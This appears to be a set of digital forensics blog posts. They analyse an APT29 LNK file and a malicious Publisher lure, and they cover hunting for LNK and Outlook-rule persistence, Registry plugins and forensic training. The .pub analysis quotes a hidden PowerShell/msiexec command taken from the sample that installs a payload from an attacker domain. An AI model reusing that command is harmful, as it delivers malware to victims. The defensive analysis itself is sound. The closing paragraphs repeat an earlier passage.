November 2018 saw a Cozy Bear/APT29 campaign, discussed in FireEye's blog post regarding APT29 activity (from 19 Nov 2018), as well as in this Yoroi blog regarding the Cozy Bear campaign (from 21 Nov 2018). I found this particular campaign a bit fascinating, as it is another example of actors sending their targets LNK files that had been created on a system other than the victim's.
However, one of the better (perhaps even the best) write-ups regarding the LNK file deployed in this campaign is Oleg's description of his process for parsing that file. His write-up is very comprehensive, so I won't steal any of his thunder by repeating it here. Instead, I wanted to dig just a bit deeper into the LNK file structure itself.
Using my own parser, I extracted metadata from the LNK file structure for the "ds7002.lnk" file. The TrackerDataBlock includes much of the same information that Oleg uncovered, including the "machine ID", which is a 16-byte field containing the NetBIOS name of the system on which the LNK file was created:
***TrackerDataBlock***
Machine ID : user-pc
New Droid ID Time : Thu Oct 6 17:03:04 2016 UTC
New Droid ID Seq Num : 13273
New Droid Node ID : 08:00:27:92:24:e5
Birth Droid ID Time : Thu Oct 6 17:03:04 2016 UTC
Birth Droid ID Seq Num: 13273
Birth Droid Node ID : 08:00:27:92:24:e5
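Just to illustrate what's in that block, below is a minimal Python sketch of pulling the fields apart, assuming you've already isolated the 0xA0000003 extra data block from the end of the LNK file. The layout follows the MS-SHLLINK documentation, and the object ID GUIDs are version-1 UUIDs, which is where the time stamps, sequence numbers, and MAC addresses above come from:

import struct
import uuid
from datetime import datetime, timedelta, timezone

def parse_tracker_datablock(block: bytes):
    # BlockSize, BlockSignature (0xA0000003), Length, Version
    size, sig, length, version = struct.unpack_from("<IIII", block, 0)
    assert sig == 0xA0000003, "not a TrackerDataBlock"
    # MachineID: 16 bytes, NUL-padded NetBIOS name
    machine_id = block[16:32].split(b"\x00", 1)[0].decode("ascii", "replace")
    # Droid and DroidBirth are each a pair of GUIDs; the second GUID of each
    # pair is a version-1 UUID carrying a time stamp, sequence number, and MAC
    new_oid = uuid.UUID(bytes_le=block[48:64])
    birth_oid = uuid.UUID(bytes_le=block[80:96])

    def describe(u):
        # UUIDv1 time: 100ns intervals since 15 Oct 1582 (RFC 4122)
        ts = datetime(1582, 10, 15, tzinfo=timezone.utc) + timedelta(microseconds=u.time // 10)
        mac = ":".join(f"{(u.node >> s) & 0xff:02x}" for s in range(40, -8, -8))
        return ts, u.clock_seq, mac

    return machine_id, describe(new_oid), describe(birth_oid)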
From the TrackerDataBlock, we can also see one of the MAC addresses recognized by the system. Using the OUI lookup tool from Wireshark, we see that the OUI for the displayed MAC address points to "PcsCompu PCS Computer Systems GmbH". From WhatsMyIP, we get "Pcs Systemtechnik Gmbh".
Further, there's a SID located in the PropertyStoreDataBlock:
***PropertyStoreDataBlock***
SID: S-1-5-21-1764276529-1526541935-4264456457-1000
Finally, there's the volume serial number embedded within the LNK file:
vol_sn C4B2-BD1C
A combination of the volume serial number, machine ID, and the SID from the PropertyStoreDataBlock can be used to create a Yara rule, which can then be submitted as a retro-hunt on VirusTotal in order to locate other examples of LNK files created on this system.
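Purely as a sketch of what such a rule might look like (the on-disk encodings are assumptions on my part: the machine ID as an ASCII string, the SID as a UTF-16 string, and the volume serial number as a little-endian DWORD), something along these lines can be compiled and tested locally via the yara-python bindings before being submitted as a retro-hunt:

import yara

# Hypothetical rule built from the metadata above
RULE = r'''
rule lnk_userpc_builder
{
    strings:
        $machine_id = "user-pc" ascii   // TrackerDataBlock machine ID
        $sid = "S-1-5-21-1764276529-1526541935-4264456457-1000" wide  // PropertyStoreDataBlock SID
        $vol_sn = { 1C BD B2 C4 }       // volume serial number C4B2-BD1C, little-endian
    condition:
        uint32(0) == 0x0000004C and all of them
}
'''

rules = yara.compile(source=RULE)
print(rules.match("ds7002.lnk"))   # or rules.match(data=buf) for an in-memory buffer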
Note that the FireEye write-up mentions a previous campaign (described by Volexity) in which a similar LNK file was used. In that case, MAC address, SID, and volume serial number were identical to the ones seen in the LNK file in the Nov 2018 campaign. The file size was different, and the embedded PowerShell command was different, but the rest of the identifying metadata remained the same two years later.
Another aspect of the LNK file from the Nov 2018 campaign is the embedded PowerShell command. As Oleg pointed out, the PowerShell command itself is encoded as a base64 string; or, perhaps more accurately, a "base" + 0x40 encoded string. The manner in which commands are obfuscated can be very telling, and can perhaps even be used as a means for tracking the evolution of the technique's use.
This leads to another interesting aspect of this file; rather than using an encoded PowerShell command to download the follow-on payload(s), those payloads are carried, encoded, within the file itself. The delivered LNK file is over 400K in size (the LNK file from 2016 was over 660K), which is quite unusual for such a file, particularly given that the LNK structure itself ends at offset 0x0d94, meaning the shortcut structure proper is only 3476 bytes.
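Carving whatever has been appended past the end of the shortcut structure is straightforward; a minimal sketch is below (the 0x0d94 offset is taken from the parser output, and the output file name is hypothetical). What comes back is still encoded, and would still need to be decoded:

# Carve the data appended after the LNK structure proper
LNK_STRUCT_END = 0x0D94

with open("ds7002.lnk", "rb") as f:
    data = f.read()

appended = data[LNK_STRUCT_END:]
print(f"LNK structure: {LNK_STRUCT_END} bytes, appended data: {len(appended)} bytes")

with open("ds7002_appended.bin", "wb") as out:   # hypothetical output name
    out.write(appended)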
Oleg did a great job of walking through the collection, parsing and decoding/decryption of the embedded PDF and DLL files, as well as of writing up and sharing his process. From a threat intel perspective, identifying information extracted from file metadata can be used to further the investigation and help build a clearer intel picture.
Addendum, 31 Dec: Here's a fascinating tweet thread regarding using DOSDate time stamps embedded in shellitems to identify "weaponization time" of the LNK file, and here's more of that conversation.
Friday, December 28, 2018
PUB File
Earlier this month, I saw a tweet that led me to this Trend Micro write-up regarding a spam campaign where the bad guys sent malicious MS Publisher .pub file attachments that downloaded an MSI file (using .pub files as lures has been seen before). The write-up included a hash for the .pub file, which I was able to use to locate a copy of the file, so I could take a look at it myself. MS Publisher files follow the OLE file format, so I wanted to take a shot at "peeling the onion" on this file, as it were.
Why would I bother doing this? For one, I believe that there is a good bit of value that goes unrealized when we don't look at artifacts like this; value that may not be immediately apparent to a #DFIR analyst, but may be much more useful to an intel analyst.
I should note that the .pub file is detected by Windows Defender as Trojan:O97M/Bynoco.PA.
The first thing I did was run 'strings' against the file. Below are some of the more interesting strings I was able to find in the file:
E:\tmp\wix_tmp\officehomems.com_sched\1en.pub
proverka@example.com
BaseClass=crysler
comodostar
alabama
Document created using the application not related to Microsoft Office
For viewing/editing, perform the following steps:
Click Enable editing button from the yellow bar above.
Once you have enabled editing, please click Enable Content button from the yellow bar above.
"-executionpolicy bypass -noprofile -w hidden -c & ""msiexec"" url1=gmail url2=com /q /i http://homeofficepage[.]com/TabSvc"
Shceduled update task
One aspect of string searches in OLE-format files that analysts need to keep in mind is that the file structure truly is one of a "file system within a file", as the structure includes sector tables that identify the sectors that comprise the various streams within the file. What this means is that the streams themselves are not contiguous, and that strings contained in the file may be split across sectors. For example, it is possible that for the string "alabama" listed above, part of the string (i.e., "ala") may exist in one sector, and the remaining portion of the string may exist in another sector, so that searching for the full string may not find all instances of it. Further, VBA macros are stored compressed, throwing another monkey wrench into string searches.
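One way around the fragmentation issue is to let an OLE parser reassemble each stream and then search the stream data, rather than the raw file. Below is a minimal sketch using the olefile Python module (the file name is taken from the embedded path above and is just a local copy of the sample; this does nothing about compressed VBA macros):

import olefile

NEEDLES = [b"alabama", b"comodostar", b"Shceduled"]

ole = olefile.OleFileIO("1en.pub")
for path in ole.listdir(streams=True, storages=False):
    data = ole.openstream(path).read()   # stream reassembled from its sectors
    for needle in NEEDLES:
        if needle in data:
            print("/".join(path), needle.decode())
ole.close()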
Back to the strings themselves; I'm sure that you can see why I saw these as interesting strings. For example, note the misspelling of "Shceduled". This may be something on which we can pivot in our analysis, locating instances of a scheduled task with that same misspelling within our infrastructure. Interestingly enough, when I ran a Google search for "shceduled task", most of the responses I got were legitimate posts where the author had misspelled the word. ;-)
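As a quick illustration of that pivot, here's a rough sketch that sweeps a system's on-disk task definitions for the misspelling; the paths are assumptions, and at scale you'd push something like this out via EDR or a remote collection framework rather than run it by hand:

from pathlib import Path

TASK_DIR = Path(r"C:\Windows\System32\Tasks")   # on-disk XML task definitions
MISSPELLING = "shceduled"

for task in TASK_DIR.rglob("*"):
    if not task.is_file():
        continue
    name_hit = MISSPELLING in task.name.lower()
    try:
        # task XML is typically UTF-16 encoded
        body_hit = MISSPELLING in task.read_text(encoding="utf-16", errors="ignore").lower()
    except OSError:
        continue
    if name_hit or body_hit:
        print("suspicious task:", task)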
The message to the user seen in the strings above looks similar to figure 2 found in this write-up regarding Sofacy, but searching a bit further, we find the exact message string being used in lures that end up deploying ransomware.
Next, I ran 'oledmp.pl' against the file; below is the output, trimmed for readability:
Root Entry Date: 20.11.2018, 14:40:11 CLSID: 00021201-0000-0000-00C0-000000000046
1 D.. 0 20.11.2018, 14:40:11 \Objects
2 D.. 0 20.11.2018, 14:40:11 \Quill
3 D.. 0 20.11.2018, 14:40:11 \Escher
4 D.. 0 20.11.2018, 14:40:11 \VBA
7 F.. 10602 \Contents
8 F.T 94 \CompObj
9 F.T 16384 \SummaryInformation
10 F.T 152 \DocumentSummaryInformation
11 D.. 0 20.11.2018, 14:40:11 \VBA\VBA
12 D.. 0 20.11.2018, 14:40:11 \VBA\crysler
18 F.. 387 \VBA\crysler\f
19 F.. 340 \VBA\crysler\o
20 F.T 97 \VBA\crysler\CompObj
21 F.. 439 \VBA\crysler\ VBFrame
22 F.. 777 \VBA\VBA\dir
23 FM. 1431 \VBA\VBA\crysler
30 FM. 8799 \VBA\VBA\ThisDocument
As you can see, there are a number of streams that include macros. Also, from the output listed above, we can see that the file was likely created on 20 Nov 2018, which is something that can likely be used by intel analysts.
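olefile also exposes the per-entry time stamps, which is a quick way to corroborate that date; a short sketch is below (I'm assuming a current olefile release, which provides getctime() and getmtime() for directory entries):

import olefile

ole = olefile.OleFileIO("1en.pub")    # local copy of the sample
for path in ole.listdir(streams=True, storages=True):
    ctime = ole.getctime(path)        # creation time from the directory entry, if set
    mtime = ole.getmtime(path)        # modification time, if set
    if ctime or mtime:
        print("/".join(path), ctime, mtime)
ole.close()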
Using oledump.py to extract the macros, we can see that they aren't obfuscated in any way. In fact, the two visible macros are well-structured and don't appear to do much at all; the malicious functionality appears to be embedded somewhere else within the file itself.
Windows Artifacts and Threat Intel
I ran across a pretty fascinating tweet thread from Steve the other day. In this thread, Steve talked about how he's used PDB paths to not just get some interesting information from malware, but to build out a profile of the malware author over a decade, and how he was able to pivot off of that information. In the tweet thread, Steve provides some very interesting foundational information, as well as an example of how this information has been useful. Unfortunately, it's in a tweet thread and not some more permanent format.
I still believe that something very similar can be done with LNK files sent by an adversary, as well as other "weaponized" documents. This includes OLE-format Word and Publisher documents, as well. Using similar techniques to what Steve employed, including Yara rules to conduct a VT retro-hunt, information can be built out using not just information collected from the individual files themselves, but information provided by VT, such as submission date, etc.
Wednesday, December 19, 2018
Hunting and Persistence
Sometimes when hunting, we need to dig a little deeper, particularly where the actor employs novel persistence mechanisms. Persistence mechanisms that are activated by some means other than a system start or user login can be challenging for a hunter to root (pun intended) out.
During one particular hunting engagement, svchost.exe was seen communicating out to a known-bad IP address, and the hunters needed to find out a bit more about what might be the cause of that activity. One suggestion was to determine the time frame or "temporal proximity" of the network activity to other significant events; specifically, determine whether something was causing svchost.exe to make these network connections, or find out if this activity was being observed "near" a system start.
As it turned out, the hunters in that case had access to data that had been collected as part of the EDR installation process (i.e., collect data, install EDR agent), and were able to determine the true nature of the persistence.
Sometimes, persistence mechanisms aren't all that easy or straightforward to determine, particularly if the actor established a foothold within the target infrastructure before instrumentation was put in place. It is also difficult to determine persistence within an infrastructure when complete visibility has not been achieved, and there are "nexus systems" that do not have the benefit of instrumentation. The actor may be seen interacting with instrumented systems, but those systems may be ancillary to their activity, rather than the portal systems to which they continually return.
One persistence mechanism that may be difficult to uncover is the use of the "icon filename" field within Windows shortcut/LNK files. Depending upon where the LNK file is located on the system (i.e., not in the user's StartUp folder), the initiation of the malicious network connection may not be within temporal proximity of the user logging into the system, making it more difficult to determine the nature of the persistence. So how does this persistence mechanism work? Per Rapid7, when a user accesses the shortcut/LNK file, SMB and WebDav connections are initiated to the remote system.
Also, from here:
Echoing Stuxnet, the attackers manipulated LNK files (Windows shortcut files), to conduct malicious activities. In this case, they used LNK files to gather user credentials when the LNK file attempted to load its icon from a remote SMB server controlled by the attackers.
As you can see, this persistence method would then lead to the user's credentials being captured for cracking, meaning that the actor may be able to return to the environment following a global password change. Be sure to check out this excellent post from Bohops that describes ways to collect credentials to be cracked.
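Before moving on, here's a rough way to hunt for shortcuts whose icon resource points at a remote host. Rather than fully parsing each LNK file, this sketch just looks for UTF-16 UNC strings in the file contents, which is crude but cheap; the search roots are examples, not an exhaustive list:

import re
from pathlib import Path

# Crude heuristic: a UTF-16LE "\\host\share..." string anywhere in the shortcut
UNC_RE = re.compile(rb"(?:\\\x00){2}(?:[\x20-\x7e]\x00){2,}")

SEARCH_ROOTS = [
    Path(r"C:\Users"),
    Path(r"C:\ProgramData\Microsoft\Windows\Start Menu"),
]

for root in SEARCH_ROOTS:
    for lnk in root.rglob("*.lnk"):
        try:
            data = lnk.read_bytes()
        except OSError:
            continue
        for m in UNC_RE.finditer(data):
            print(lnk, m.group().decode("utf-16-le", "ignore"))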
Another persistence mechanism that may be difficult for hunters to suss out is the use of Outlook rules (description from MWR Labs, who also provide a command line tool for creating malicious Outlook rules, which includes a switch to display existing rules). In short, an actor with valid credentials can access OWA and create an Outlook rule that, when the trigger email is received, can launch a PowerShell script to download and launch an executable, or open a reverse shell, or take just about any other action. Again, this persistence mechanism is completely independent of remediation techniques such as global password changes.
Additional Resources
MS recommendations to detect and remediate OutLook rules
Detecting OutLook rules WRT O365, from TechNet
Addendum, 21 Dec: FireEye blog post references SensePost's free tool for abusing Exchange servers and creating client-side mail rules.
Addendum, 24 Dec: Analysis of LNK file sent in the Cozy Bear campaign
Tuesday, December 18, 2018
Updates
Based on some testing that Phill had done, I recently updated my Recycle Bin index file ($I*, INFO2) parser. Since then, there have been some other developments, and I wanted to document some additional updates.
NTFSDisableLastAccessUpdate
We have seen recently that, apparently, as of Win10 1803 there have been changes made to the NTFSDisableLastAccessUpdate value in the Registry (David, Maxim). In short, rather than the "yes" or "no" (i.e., "1" or "0") value data that we're used to seeing, there are a total of 4 options now.
I've updated the disablelastaccess.pl plugin accordingly.
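For reference, here's a quick sketch that reads the value and maps it to the four states reported for 1803 and later; the value-to-meaning mapping reflects my reading of the write-ups referenced above, so treat it as an assumption to verify against your own builds:

import winreg

# Assumed mapping, matching what 'fsutil behavior query disablelastaccess'
# reports on Win10 1803+
STATES = {
    0: "User Managed, Last Access Updates Enabled",
    1: "User Managed, Last Access Updates Disabled",
    2: "System Managed, Last Access Updates Enabled",
    3: "System Managed, Last Access Updates Disabled",
}

key = winreg.OpenKey(
    winreg.HKEY_LOCAL_MACHINE,
    r"SYSTEM\CurrentControlSet\Control\FileSystem",
)
raw, _ = winreg.QueryValueEx(key, "NtfsDisableLastAccessUpdate")
winreg.CloseKey(key)

# Only the low two bits map to the states above; higher-order bits have been
# observed on some builds, so print the raw data as well
print(f"raw value: {raw:#010x} -> {STATES.get(raw & 0x3, 'unknown')}")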
SysCache.hve
Maxim shared some interesting insight into the SysCache.hve file recently. This is a file whose structure follows that of Registry hive files (similar to the AmCache.hve file), and is apparently only found on Win7 systems.
There's some additional insight here (on Github) regarding the nature of the various values within some of the keys.
I created the syscache.pl plugin to parse this file, and to really make use of it, you need to also have the MFT from the system, as the SysCache.hve file does not record file names; rather, it records the MFT record number, which is a combination of the entry number and the sequence number for the file record within the MFT.
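Splitting that 64-bit reference into its two pieces is simple enough; a minimal sketch is below (the sample value is made up, purely to show the arithmetic):

def split_mft_reference(ref: int):
    # low 48 bits = entry (record) number, high 16 bits = sequence number
    entry = ref & 0x0000FFFFFFFFFFFF
    sequence = ref >> 48
    return entry, sequence

# made-up example value
entry, seq = split_mft_reference(0x0005000000009C41)
print(entry, seq)   # 40001 5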
PowerShell Logging
As my background is in DFIR work and not system administration, it was only recently that I ran across PowerShell Transcription Logging. This is a capability that can be enabled via GPO, and as such, there are corresponding Registry values (in addition to the use of the Start-Transcript cmdlet, which can be deployed via PS profiles) that enable the capability. There's also a Registry value that allows for timestamps to be recorded for each command.
This capability records what goes on with PowerShell during a session, and as such, can be pretty powerful stuff, particularly when combined with PowerShell logging.
To see what PowerShell transcription logging can provide to an analyst, take a look at this example, provided by FireEye, of a recorded Invoke-Mimikatz script session. Here's an example (also from FireEye) of what the results of module logging look like for the same session.
As these settings can inform an analyst as to what they can expect to find on a system, I created the pslogging.pl plugin. However, a dearth of available data has really limited my ability to test the plugin.
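As a quick check of whether transcription is even enabled on a system, the policy values can be read directly from the Registry; the key and value names below are the commonly documented ones for the GPO settings (EnableInvocationHeader is the value that adds the per-command time stamps):

import winreg

KEY_PATH = r"SOFTWARE\Policies\Microsoft\Windows\PowerShell\Transcription"
VALUES = ["EnableTranscripting", "EnableInvocationHeader", "OutputDirectory"]

try:
    key = winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, KEY_PATH)
except FileNotFoundError:
    print("transcription policy key not present")
else:
    for name in VALUES:
        try:
            data, _ = winreg.QueryValueEx(key, name)
            print(f"{name} = {data}")
        except FileNotFoundError:
            print(f"{name} not set")
    winreg.CloseKey(key)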
*Note: This post was originally authored on 9 Dec 2018
Saturday, November 24, 2018
Tool Testing
Phill recently posted regarding some testing that he'd conducted, with respect to tools for parsing Windows Recycle Bin files. From Phill's blog post, and follow-on exchanges via Twitter, it seems that Phill tested the following tools (I'm assuming these are the versions tested):
- rifiuti2
- Jason Hale's $I Parse - blog posts here and here
- Dan Mare's RECYCLED_I app - the main software page states "RECYCLED_I: Program to parse the $I files extracted via a forensic software package. Special request.", but you can download it (and get syntax/usage) from here.
- My own recbin.pl/.exe
Phill's testing resulted in Eric Zimmerman creating RBCmd (tweet thread).
What I was able to determine after the fact is that the "needs" of a parsing tool were:
- parse Recycle Bin files from XP/2003 systems (INFO2), as well as Win7 & Win10 ($I*)
- for Win7/10, be able to parse all $I* files in a folder.
The results from the testing were (summarized):
- Some tools didn't do everything; some don't parse both XP- and Win7-style Recycle Bin files, and the initial versions of the tool I wrote parsed but did not display file sizes (it does now)
- The tool I wrote can optionally display tabular, CSV, and TLN output
- Eric's RBCmd parses all file types, including directories of $I* files; from the tweet thread, it appears that RBCmd displays tabular and CSV output
- rifiuti2 was the fastest
So, if you're looking to parse Recycle Bin index files (either INFO2 or $I* format)...there you go.
$I* File Structures
As Jason Hale pointed out over 2 1/2 years ago, the $I* file structure changed between Win7 and Win10. Most of the values are in the same location (the version number...the first eight bytes...was updated from 1 to 2), but where Win7 had a fixed-length field that included the name and original path (in Unicode) of the file, Win10 and Win2016 have a four-byte name length field, followed by the file path and name, in Unicode.
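Here's a minimal sketch of parsing both layouts, based on the structure Jason documented; I'm treating the header/version, file size, and deletion time as 64-bit little-endian values, with the deletion time as a Windows FILETIME, and the $I file name is hypothetical:

import struct
from datetime import datetime, timedelta, timezone

def filetime_to_dt(ft: int):
    # FILETIME: 100ns intervals since 1 Jan 1601 UTC
    return datetime(1601, 1, 1, tzinfo=timezone.utc) + timedelta(microseconds=ft // 10)

def parse_dollar_i(data: bytes):
    version, file_size, deleted_ft = struct.unpack_from("<QQQ", data, 0)
    if version == 1:        # Vista through Win8.1: fixed 260-character path
        path = data[24:24 + 520].decode("utf-16-le").split("\x00", 1)[0]
    elif version == 2:      # Win10/Win2016: length-prefixed path
        (name_len,) = struct.unpack_from("<I", data, 24)
        path = data[28:28 + name_len * 2].decode("utf-16-le").rstrip("\x00")
    else:
        raise ValueError(f"unknown $I version: {version}")
    return version, file_size, filetime_to_dt(deleted_ft), path

with open(r"$IABC123.txt", "rb") as f:    # hypothetical $I file name
    print(parse_dollar_i(f.read()))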
Resources
SemanticScholar PDF
4n6Explorer article
Friday, November 23, 2018
Basic Skillz, pt II
Following my initial post on this topic, and to dovetail off of Brett's recent post, I wanted to provide something of a consolidated view based on the comments received.
For the most part, I think Brett's first comment was very much on point:
Should be easy enough to determine what would constitute basic skills, starting with collecting the common skills needed across every specialty (the 'basic things'). Things like, seizing evidence, imaging, hashing, etc..
Okay, so that's a really good start. Figure out what is common across all specialties, and come up with a core set of skills that are independent of OS, platform, etc., in order to determine what constitutes a "Basic DF Practitioner". These skills will need to be testable and verifiable; some will likely be "you took a test and achieved a score", while others will be pass/fail, or verification of the fact that you were able to demonstrate the skill to some degree. Yes, this will be more subjective than a written test, but there are some skills (often referred to as "soft skills") that, while important, are hard to pin down to the point of having a written test to verify them.
Brigs had some great thoughts as far as a breakdown of skill sets goes, although when I read his comment, I have to admit that in my head, I read it in my Napoleon Dynamite voice. ;-) Taking this a step further, however, I wanted to address @mattnotmax's comments, as I think they provide a really good means to walk through the thought process.
1. collect the evidence properly
What constitutes "properly"? The terms "forensics" and "evidence" bring a legal perspective to the forefront in discussions on this topic, and while I fully believe that there should be one standard to which we all strive to operate, the simple fact is that business processes and requirements very often prevent us from relying on one single standard. While it would be great to be able to cleanly shut a system down and extract the hard drive(s) for acquisition, there are plenty of times we cannot do so. I've seen systems with RAID configurations shut down and the individual drives acquired, but the order of the drives and the RAID configuration itself was never documented; as such, we were left with disk images that were useless. On the other hand, I've acquired images from live systems with USB 1.0 connections by mapping a drive (an ext HDD) to another system on the network that had USB 2.0 connections.
I think we can all agree that we won't always have the perfect, isolated, "clean room-ish" setting for acquiring data or 'evidence'. Yes, it would be nice to have hard drives removed from systems, and be able to have one verified/validated method for imaging that data, but that's not always going to be the case.
Live, bare-metal systems do not have a "hard drive" for memory, and memory acquisition inherently requires the addition of software, which modifies the contents of memory itself.
I have never done mobile forensics but I'm sure that there are instances, or even just specific handsets, where an analyst cannot simply shut the handset down and acquire a complete image of the device.
I would suggest that rather than simply "collect the evidence properly", we lean toward understanding how evidence can be collected (that one size does not fit all), and that the collection process must be thoroughly documented.
2. image the hard drive
Great point with respect to collection...but what if "the hard drive" isn't the issue? What if it's memory? Or a SIM card? See my thoughts on #1.
3. verify the tool that did the imaging, and then verify the image taken
I get that the point here is the integrity of the imaging process itself, as well as maintaining and verifying the integrity of the acquired image. However, if your only option for collecting data is to acquire it from a live system, and you cannot acquire a complete copy of the data, can we agree that what is important here is (a) documentation, and (b) understanding image integrity as it applies to the process being used (and documented)?
For items 1 thru 3, can we combine them into understanding how evidence or data can be collected, techniques for doing so, and that all processes must be thoroughly documented?
4. know what sort of analysis is required even if they don't know how to do it (i.e. can form a hypothesis)
Knowing what sort of analysis is required is predicated on understanding the goals of the acquisition and analysis process. What you are attempting to achieve drives and informs your acquisition process (i.e., what data/evidence you will seek to acquire).
5. document all their process, analysis and findings
Documentation is the key to all of this, and as such, I am of the opinion that it needs to be addressed very early in the process, as well as throughout the process.
6. can write a report and communicate that report to a technical and non-technical audience.
If you've followed the #DFIR industry for any period of time, you'll see that there are varying opinions as to how reporting should be done. I've included my thoughts as to report writing both here in this blog, as well as in one of my books (i.e., ch 9 of WFA 4/e). While the concepts and techniques for writing DFIR reports may remain fairly consistent across the industry, I know that a lot of folks have asked for templates, and those may vary based on personal preference, etc.
All of that being said, I'm in agreement with Brett, with respect to determining a basic skill set that can be used to identify a "Basic DF Practitioner". From there, one would branch off to different specialties (OS- or platform-specific), likely with different levels (i.e., MacOSX practitioner level 1, MacOSX analyst level 1, etc.)
As such, my thoughts on identifying and developing basic skills in practitioners include:
1. Basic Concepts
Some of the basic concepts for the industry (IMHO) include documentation, writing from an analytic standpoint (exercises), reviewing others' work and having your work reviewed, etc.
For a training/educational program, I'd highly recommend exercises that follow a building block approach. For example, start by having students document something that they did over the weekend; say, attending an event or going to a restaurant or movie. Have them document what they did, then share it, giving them the opportunity to begin speaking in public. Then have them trade their documentation with someone else in the class, and have that person attempt to complete the same task, based on the documentation. Then, that person reviews the "work product", providing feedback.
Another approach is to give the students a goal, or set of goals, and have them develop a plan for achieving the goals. Have them implement the plan, or trade plans such that someone else has to implement the plan. Then conduct a "lessons learned" review; what went well, what could have gone better, and what did we learn from this that we can use in the future?
This is where the building blocks start. From here, provide reading materials for which the students provide reviews, and instead of having the instructor/teacher read them all, have the students share the reviews with other students. This may be a good way to begin building the necessary foundation for the industry.
2. Understanding File Systems and Structures
This area is intended to develop an understanding of how data is maintained on storage systems, and is intended to cover the most common formats, from a high level. For example (and this is just an example):
MacOSX - HFS, HFS+, file structures such as plists
Linux - ext3/4
Windows - NTFS, perhaps some basic file structures (OLE, Registry)
Depending on the amount of information and the depth into which the instructor/teacher can go, the above list might be trimmed down, or include Android, network packets, common database formats (i.e., SQLite), etc.
Students can then get much more technically in-depth as they progress into their areas of specialization, or into a further level as "practitioner", before they specialize.
Just a note on "specialization" - this doesn't mean that anyone is pigeon-holed into one area; rather, it refers to the training. This means that skill sets are identified, training is provided, and skills are achieved and measured such that they can be documented. In this way, someone who achieves "MacOSX analyst level 2" is known to have completed training and passed testing for a specific set of skills that they can then demonstrate. The same would hold true for other specialized areas.
3. Data Acquisition and Integrity
The next phase might be one in which basic techniques for data acquisition are understood. I can see this as being a fantastic area for "fam fires"; that is, opportunities for the students to get hands-on time with various techniques. Some of these, such as using write blockers, etc., should be done in the classroom, particularly at the early stages.
In this class, you could also get into memory acquisition techniques, with homework assignments to collect memory from systems using various techniques, documenting the entire process. Then students will provide their "reports" to other students to review. This provides other opportunities for evaluation, as well; for example, have a student with, say, a Mac system provide their documentation to another student with a Mac, and see if the process returns similar results.
We want to be sure that some other very important topics are not skipped, such as acquiring logs, network captures (full packet captures vs. netflow), etc. Again, this should be a high-level understanding, with familiarization exercises, and full/complete documentation.
4. Techniques of Analysis
I think that beginning this topic as part of the basic skill set is not only important, but a good segue into areas of specialization. This is a great place to reiterate the foundational concepts; determine goals, develop a plan, document throughout, and conduct a review (i.e., "lessons learned"). With some basic labs and skills development exercises, an instructor can begin including things such as how those "lessons learned" might be implemented. For example, a Yara rule, or a grep statement for parsing logs or packet captures. But again, this is high-level, so detailed/expert knowledge of writing a Yara rule or grep expression isn't required; the fact that one can learn from experiences, and share that knowledge with others should be the point.
Again, this is mostly high-level, and a great way to maximize the time might be to have students get into groups and pick or be assigned a project. The delivery of the project should include a presentation of the goals, conduct of the project, lessons learned, and a review from the other groups.
What needs to be common throughout the courses is the building block approach, with foundations being built upon and skills developed over time.
As far as skill development goes, some things I've learned over time include:
We all learn in different ways. Some learn through auditory means, others visually, and others by doing. Yes, at a young age, I sat in a classroom and heard how to put on MOPP NBC protective gear. However, I really learned by going out to the field and doing it, and I learned even more about the equipment by having to move through thick bush, wearing all of the equipment, in Quantico, in July.
I once worked for a CIO who said that our analysts needed to be able to pick up a basic skill through reading books, etc., as we just could not afford to send everyone to intro-level training for everything. I thought that made perfect sense. When I got to a larger team, there were analysts who came right out and said that they could not learn something new unless they were sitting in a classroom and someone was teaching it to them. At first, I was aghast...but then I realized that what they were saying was that, during the normal work day, there were too many other things going on...booking travel, submitting expenses, performing analysis and report writing...such that they didn't feel that they had the time to learn anything. Being in a room with an instructor took them out of the day-to-day chaos, allowed them to focus on that topic, to understand, and ask questions. Well, that's the theory, anyway. ;-)
We begin learning a new skill by developing a foundational understanding, and then practicing the skill based on repeating a "recipe". Initial learning begins with imitation. In this way, we learn to follow a process, and as our understanding develops, we begin to move into asking questions. This helps us develop a further understanding of the process, from which we can then begin making decisions when new situations arise. However, developing new skills doesn't mean we relinquish old ones, so when a new situation arises, we still have to document our justification for deviating from the process.
Addendum
Some additional thoughts that I had after clicking "publish"...
First, the above "courses" could be part of an overall curriculum, and include other courses, such as programming, etc.
Second, something else that needs to be considered from the very beginning of the program is specificity of language. Things are called specific names, and this provides a means by which we can clearly communicate with other analysts, as well as non-technical people. For example, I've read malware write-ups from vendors, including MS, that state that malware will create a Registry "entry"; well, what kind of entry? A key or a value? Some folks I've worked with in the past have told me that I'm pedantic for saying this, but it makes a difference; a key is not a value, nor vice versa. They each have different structures and properties, and as such, should be referred to as what they are, correctly.
Third, to Brett's point, vendor-specific training has its place, but should not be considered foundational. In 1999, I attended EnCase v3 Intro training; during the course, I was the only person in the room who did not have a gun and a badge. The course was both taught and attended by sworn law enforcement officers. At one point during the training, the instructor briefly mentioned MD5 hashes, and then proceeded on with the material. I asked if he could go back and say a few words about what a hash was and why it was important, and in response, he offered me the honor and opportunity of doing so. My point is the same as Brett's...it's not incumbent upon a vendor to provide foundational training, but that training (and the subsequent knowledge and skills) is, indeed, foundational (or should be) to the industry.
Here is a DFRWS paper that describes a cyber forensics ontology; this is worth consideration when discussing this topic.
For the most part, I think Brett's first comment was very much on point:
Should be easy enough to determine what would constitute basic skills, starting with collecting the common skills needed across every specialty (the 'basic things'). Things like, seizing evidence, imaging, hashing, etc..
Okay, so that's a really good start. Figure out what is common across all specialties, and come up with a core set of skills that are independent of OS, platform, etc., in order to determine what constitutes a "Basic DF Practitioner". These skills will need to be able to be tested and verified; some will likely be "you took a test and achieved a score", while other skills be pass/fail, or verification of the fact that you were able to demonstrate the skill to some degree. Yes, this will be more subjective that a written test, but there are some skills (often referred to as "soft skills") that while important, one may not be able to put their finger on to the point of having a written test to verify that skill.
Brigs had some great thoughts as far as a break down of skill sets goes, although when I read his comment, I have to admit that in my head, I read it in my Napolean Dynamite voice. ;-) Taking this a step further, however, I wanted to address @mattnotmax's comments, as I think they provide a really good means to walk through the thought process.
1. collect the evidence properly
